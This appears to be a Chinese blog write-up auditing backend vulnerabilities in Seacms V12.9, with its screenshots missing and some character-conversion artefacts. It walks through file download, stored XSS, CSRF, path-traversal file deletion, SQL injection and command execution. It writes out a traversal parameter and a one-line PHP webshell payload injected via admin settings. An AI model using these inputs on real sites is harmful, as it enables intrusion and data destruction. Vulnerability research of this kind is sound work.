天天看點

Seacms V12.9

任意檔案下載下傳:

代碼審計:

通過定位file_get_contents()函數:

Seacms V12.9

找尋有可控變量的檔案:

背景檔案/n5y4um/admin_safe.php,代碼94行。
           
Seacms V12.9

 漏洞複現:

進入背景這個頁面:

Seacms V12.9
Seacms V12.9

XSS:

因為已經登入背景,是以找存儲型的XSS,在擴充中添加廣告,友情連結這些地方進行嘗試:

Seacms V12.9

直接修改海洋cms名稱,拼接js, 

Seacms V12.9

存儲型XSS:

Seacms V12.9

 前台頁面:

Seacms V12.9

 CSRF:

嘗試添加系統管理者:

Seacms V12.9

構造poc:

Seacms V12.9

 在另一浏覽器打開:

Seacms V12.9
Seacms V12.9
Seacms V12.9

任意檔案删除

代碼審計: 
Seacms V12.9

 網頁打開admin_template.php,添加參數action=del&filedir=../templets/default/html/../../../test.php。設定打開這個網頁就進行自動斷點。在 admin_template.php進行跟蹤:

Seacms V12.9
Seacms V12.9

 未對删除目錄路徑進行嚴格的過濾,會存在路徑穿越進行删除任意檔案。

漏洞複現:

在背景模闆頁面

Seacms V12.9

點選下一級目錄。

Seacms V12.9

 自己在根目錄添加一個test.php檔案,将最後的檔案名改為根目錄下自己建立的檔案路徑。

Seacms V12.9

發現根目錄下自己設定的test.php檔案删除成功。說明存在任意檔案删除漏洞。

Seacms V12.9

頁面上顯示的内容為根目錄下的檔案。會傳回抓包修改的的路徑。

Seacms V12.9

指令執行:

在背景百度推送頁面: 

Seacms V12.9

進入這個檔案檢視:

Seacms V12.9

 向上檢視這兩個參數:打開/data/admin/ping.php檔案:

Seacms V12.9

 打開/data/admin/ping.php檔案:

Seacms V12.9

是以頁面中插入一句話木馬:";eval($_REQUEST[6]);//

Seacms V12.9

檢視檔案中代碼:

Seacms V12.9

通路這個頁面:

Seacms V12.9

連接配接蟻劍即可。

指令執行2:

在背景使用者-->會員消息通知: 

Seacms V12.9

 成功儲存之後:

Seacms V12.9

去檔案中檢視出現的問題: 

Seacms V12.9
Seacms V12.9
Seacms V12.9

再次嘗試 ";eval($_REQUEST[6]);// :

Seacms V12.9

木馬上傳成功:

Seacms V12.9

 通路這個檔案:

Seacms V12.9

SQL注入:

代碼審計 

Seacms V12.9

在/背景檔案夾/admin_comment_news.php檔案。

Seacms V12.9
Seacms V12.9

追蹤這兩個函數:

Seacms V12.9
Seacms V12.9

未發現進行過濾,存在SQL注入。 

繼續閱讀